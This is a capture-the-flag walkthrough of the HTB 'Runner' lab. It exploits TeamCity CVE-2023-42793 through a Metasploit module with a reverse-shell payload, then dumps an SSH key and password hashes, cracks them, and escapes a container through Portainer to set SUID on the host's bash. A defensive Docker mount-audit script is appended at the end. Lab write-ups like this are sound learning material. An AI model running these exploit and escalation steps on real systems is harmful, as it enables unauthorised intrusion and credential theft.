Basic information

Port scan

22,80,8000:

$ nmap -sC -sV 10.10.11.13
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-22 13:47 CST
Nmap scan report for 10.10.11.13
Host is up (0.090s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.98 seconds

80

A hosts entry is needed:

10.10.11.13 runner.htb

A CI/CD-related service:

8000

Visiting it directly returns a 404:

Subdomain scan

Subdomain scanning turns up teamcity; the wordlist has to be fairly large, since it is not in the usual top-5000 list:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://runner.htb/" -H 'Host: FUZZ.runner.htb' -fs 154

[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 95ms]
* FUZZ: teamcity

teamcity

After adding the hosts entry and visiting it: TeamCity Version 2023.05.3 (build 129390):

teamcity

Searching on the version information brings up a known vulnerability:

Metasploit also has a module:

msf6 > use exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > set target 1
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
# set the remaining options

This lands a shell as the tcuser user inside the container:

data

Digging through the TeamCity data directory bit by bit turns up an SSH private key:

/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys

In addition, buildserver.data yields the password hashes of Matthew and John:

/data/teamcity_server/datadir/system/buildserver.data

$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye John john@runner.htb
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em Matthew matthew@runner.htb

Matthew's password can be cracked:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

piper123

log

Also, a few commands left in the current shell history hint at looking at the log:

The log also yields john:

cat teamcity-server.log | grep "@runner.htb"

john@runner.htb

Intended approach

Going in through the shell is actually the cumbersome route; the intended approach is to add an administrator account, log in, find a project there, and obtain the same information from it.

user flag

Matthew's recovered password does not work for SSH, but john can log in with the private key found earlier:

ssh -i john_id_rsa john@10.10.11.13

Information

Ports 9000 and 9443 are listening locally; forwarding them out and visiting shows Portainer:

ssh -i john_id_rsa john@10.10.11.13 -L 9000:127.0.0.1:9000

Matthew's credentials log in to Portainer:

Privilege escalation & root flag

Now that we are logged in to the container management platform, what follows is the standard volume-mount escape:

First create a volume and add some options:

Then create a container that uses this volume; the image can simply be teamcity:latest, and enable Interactive & TTY under the advanced options:

Then under volumes select the one created earlier and set the container path:

Then run commands as root inside the container and look at the mounted directory:

As root, simply set the SUID bit on the host's bash, which makes it convenient to operate from the earlier john shell:

root@e8b5e4abf35d:/# chmod +s /mnt/root/bin/bash
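As an added defensive check (not part of the original writeup), the escape above only works because a container gets a mount that reaches the host filesystem. The script below audits `docker inspect` and `docker volume inspect` output for such mounts, including named volumes whose local-driver options bind a host path (which plain bind-mount checks miss, since `docker inspect` shows them with Type "volume"). The sample JSON is constructed, and the sensitive-path list is an assumption to tune per environment.

```python
import json
from typing import Dict, List

# Host paths that, once writable from a container's root user, amount to host
# access. The escape above mounts the host root ("/") itself. Assumed list.
SENSITIVE_PREFIXES = ("/etc", "/root", "/bin", "/usr", "/var/run/docker.sock")

def is_sensitive_host_path(path: str) -> bool:
    if not path:
        return False
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_PREFIXES)

def risky_volumes(volume_inspect_json: str) -> Dict[str, str]:
    """Map volume name -> host device for named volumes whose driver options
    bind a host path (this is what a Portainer volume with custom options creates)."""
    out = {}
    for v in json.loads(volume_inspect_json):
        opts = v.get("Options") or {}
        device = opts.get("device", "")
        if "bind" in opts.get("o", "") and is_sensitive_host_path(device):
            out[v["Name"]] = device
    return out

def audit_containers(container_json: str, volume_json: str = "[]") -> List[Dict]:
    """Return one finding per container whose mounts or settings reach the host."""
    bound = risky_volumes(volume_json)
    findings = []
    for c in json.loads(container_json):
        reasons = []
        if c.get("HostConfig", {}).get("Privileged"):
            reasons.append("privileged")
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and is_sensitive_host_path(m.get("Source", "")):
                reasons.append(f"bind {m['Source']} -> {m.get('Destination')}")
            elif m.get("Type") == "volume" and m.get("Name") in bound:
                reasons.append(f"volume {m['Name']} ({bound[m['Name']]}) -> {m.get('Destination')}")
        if reasons:
            findings.append({"name": c.get("Name", "?").lstrip("/"), "reasons": reasons})
    return findings

# Constructed samples shaped like `docker volume inspect` / `docker inspect` output.
SAMPLE_VOLUMES = json.dumps([
    {"Name": "hostroot", "Driver": "local", "Options": {"device": "/", "o": "bind", "type": "none"}},
    {"Name": "appdata", "Driver": "local", "Options": None}])
SAMPLE_CONTAINERS = json.dumps([
    {"Name": "/escape", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Name": "hostroot", "Destination": "/mnt/root"}]},
    {"Name": "/web", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"},
                {"Type": "volume", "Name": "appdata", "Destination": "/data"}]}])
```

Run it against live data with `docker inspect $(docker ps -aq)` and `docker volume inspect $(docker volume ls -q)`; the container named "escape" above is the only one flagged.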

root flag

shadow

root:$y$j9T$ANKO0Lgp1HOfm5nPIRoTX.$S4tkxOzaYLCUAy8deQR/4sayinxeXoQb.nGRDMGUa30:19788:0:99999:7:::
matthew:$y$j9T$VcVx4oj6/0sr8ldYLVrdx1$xNznv.vvbyLEM8S6/YKAfPHP6hoYg3oD1MWRNovVlx/:19781:0:99999:7:::
john:$y$j9T$rpK6N7DunMYlKLZJcOzCY1$lcPx9lbvGZBnn7ip/qQDho2NCF/UsOmYc1P2Ve/y6F2:19781:0:99999:7:::

References